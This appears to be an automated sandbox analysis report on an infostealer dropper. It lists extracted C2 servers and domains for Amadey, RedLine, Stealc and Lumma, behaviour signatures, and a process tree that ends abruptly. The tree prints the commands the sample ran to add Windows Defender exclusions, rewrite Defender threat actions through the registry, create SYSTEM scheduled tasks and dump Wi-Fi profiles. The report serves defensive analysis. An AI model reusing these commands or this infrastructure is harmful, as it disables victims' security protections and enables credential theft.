Analysis

  • max time kernel
    35s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-05-2024 11:26

General

  • Target

    50436d0a97921514972677573da8d808407e42be73f9221472e9a85ee65b2200.exe

  • Size

    1.8MB

  • MD5

    970747403ac8b70edfbfe57c1d007276

  • SHA1

    39d5a1763ff8901d27e75e91493d416319817fb0

  • SHA256

    50436d0a97921514972677573da8d808407e42be73f9221472e9a85ee65b2200

  • SHA512

    44fa98b132688cf9ee17c931ed111ce8f074b7f6571a02f9e2f717d0d7ac2fa1fd0cb9a40c6ef7dd300ce5f6b9980e6a69e668475bb6184ad8d90b70d918687e

  • SSDEEP

    49152:/mRVDdSCiy/TxsBECGL6kV5NlxTW9yM/iXLCRC:wDfiydyE96ubxW9ELCR

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

http://185.172.128.150

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

lumma

C2

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://zippyfinickysofwps.shop/api

https://communicationgenerwo.shop/api

https://acceptabledcooeprs.shop/api

https://pillowbrocccolipe.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 16 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50436d0a97921514972677573da8d808407e42be73f9221472e9a85ee65b2200.exe
    "C:\Users\Admin\AppData\Local\Temp\50436d0a97921514972677573da8d808407e42be73f9221472e9a85ee65b2200.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:452
    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4684
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:4364
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 868
            4⤵
            • Program crash
            PID:3484
        • C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
          "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
          3⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:4972
        • C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
          "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3984
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:2916
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:2024
            • C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
              "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
              3⤵
              • UAC bypass
              • Windows security bypass
              • Checks computer location settings
              • Executes dropped EXE
              • Windows security modification
              • Checks whether UAC is enabled
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:3168
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2820
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                4⤵
                  PID:2916
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  4⤵
                  • Drops startup file
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2924
                  • C:\Users\Admin\Pictures\xT3vcuPAJ3dcjiUfM5YU4SQi.exe
                    "C:\Users\Admin\Pictures\xT3vcuPAJ3dcjiUfM5YU4SQi.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1728
                    • C:\Users\Admin\AppData\Local\Temp\u1c0.0.exe
                      "C:\Users\Admin\AppData\Local\Temp\u1c0.0.exe"
                      6⤵
                        PID:5308
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2324
                          7⤵
                          • Program crash
                          PID:2256
                      • C:\Users\Admin\AppData\Local\Temp\u1c0.1.exe
                        "C:\Users\Admin\AppData\Local\Temp\u1c0.1.exe"
                        6⤵
                          PID:5864
                          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                            7⤵
                              PID:6172
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 1444
                            6⤵
                            • Program crash
                            PID:6084
                        • C:\Users\Admin\Pictures\owHuq1kmBoVIEzQh9rkuQNmK.exe
                          "C:\Users\Admin\Pictures\owHuq1kmBoVIEzQh9rkuQNmK.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:2196
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4228
                        • C:\Users\Admin\Pictures\EkZsw7C2ScCo26ZoKGZwSZx7.exe
                          "C:\Users\Admin\Pictures\EkZsw7C2ScCo26ZoKGZwSZx7.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:2224
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4496
                        • C:\Users\Admin\Pictures\Ew0oY6T5ojckHCHuy3YMul9g.exe
                          "C:\Users\Admin\Pictures\Ew0oY6T5ojckHCHuy3YMul9g.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:3708
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:3660
                        • C:\Users\Admin\Pictures\ZCColqCHa0HVGJnMNJNxqDX6.exe
                          "C:\Users\Admin\Pictures\ZCColqCHa0HVGJnMNJNxqDX6.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:3464
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:4176
                        • C:\Users\Admin\Pictures\RHhFDQ1k8ZhaYc7LyoUdFrr6.exe
                          "C:\Users\Admin\Pictures\RHhFDQ1k8ZhaYc7LyoUdFrr6.exe"
                          5⤵
                            PID:5768
                          • C:\Users\Admin\Pictures\W7OLfrJ0PTiHJNLxPXWrEpFM.exe
                            "C:\Users\Admin\Pictures\W7OLfrJ0PTiHJNLxPXWrEpFM.exe"
                            5⤵
                              PID:1768
                              • C:\Users\Admin\AppData\Local\Temp\7zS1A35.tmp\Install.exe
                                .\Install.exe /ThYFdiduvbI "385118" /S
                                6⤵
                                  PID:2308
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    7⤵
                                      PID:5316
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                        8⤵
                                          PID:4460
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                            9⤵
                                              PID:5772
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                10⤵
                                                  PID:2724
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                              8⤵
                                                PID:4148
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  9⤵
                                                    PID:224
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      10⤵
                                                        PID:1136
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                    8⤵
                                                      PID:5828
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        9⤵
                                                          PID:5652
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            10⤵
                                                              PID:2892
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                          8⤵
                                                            PID:5916
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                              9⤵
                                                                PID:5300
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                  10⤵
                                                                    PID:5800
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                8⤵
                                                                  PID:5208
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                    9⤵
                                                                      PID:4964
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        10⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:4148
                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                          11⤵
                                                                            PID:2320
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                    7⤵
                                                                      PID:3212
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                        8⤵
                                                                          PID:1168
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                            9⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:4088
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                              10⤵
                                                                                PID:2804
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 11:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1A35.tmp\Install.exe\" it /BVodidpVau 385118 /S" /V1 /F
                                                                          7⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1144
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            8⤵
                                                                              PID:4940
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                            7⤵
                                                                              PID:5440
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                8⤵
                                                                                  PID:4308
                                                                                  • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                    9⤵
                                                                                      PID:5456
                                                                            • C:\Users\Admin\Pictures\ToQURGtWOz4gPDUDgbe3vrTB.exe
                                                                              "C:\Users\Admin\Pictures\ToQURGtWOz4gPDUDgbe3vrTB.exe"
                                                                              5⤵
                                                                                PID:2988
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS2706.tmp\Install.exe
                                                                                  .\Install.exe /ThYFdiduvbI "385118" /S
                                                                                  6⤵
                                                                                    PID:2184
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                      7⤵
                                                                                        PID:3992
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                          8⤵
                                                                                            PID:5516
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                              9⤵
                                                                                                PID:3272
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                  10⤵
                                                                                                    PID:5960
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                8⤵
                                                                                                  PID:3324
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                    9⤵
                                                                                                      PID:1740
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                        10⤵
                                                                                                          PID:1996
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                      8⤵
                                                                                                        PID:4620
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                          9⤵
                                                                                                            PID:2400
                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                              10⤵
                                                                                                                PID:5024
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                            8⤵
                                                                                                              PID:5972
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                9⤵
                                                                                                                  PID:452
                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                    10⤵
                                                                                                                      PID:3416
                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  8⤵
                                                                                                                    PID:5524
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                      9⤵
                                                                                                                        PID:1740
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                          10⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:5804
                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                            11⤵
                                                                                                                              PID:4536
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                      7⤵
                                                                                                                        PID:5520
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                          8⤵
                                                                                                                            PID:3324
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                              9⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5272
                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                10⤵
                                                                                                                                  PID:5612
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 11:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2706.tmp\Install.exe\" it /TSMdidJdFV 385118 /S" /V1 /F
                                                                                                                            7⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:4500
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                            7⤵
                                                                                                                              PID:5592
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                8⤵
                                                                                                                                  PID:4868
                                                                                                                                  • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                    9⤵
                                                                                                                                      PID:5284
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                            4⤵
                                                                                                                              PID:4532
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:4432
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                              4⤵
                                                                                                                                PID:2868
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                              3⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:4940
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                4⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:5064
                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                  netsh wlan show profiles
                                                                                                                                  5⤵
                                                                                                                                    PID:2920
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
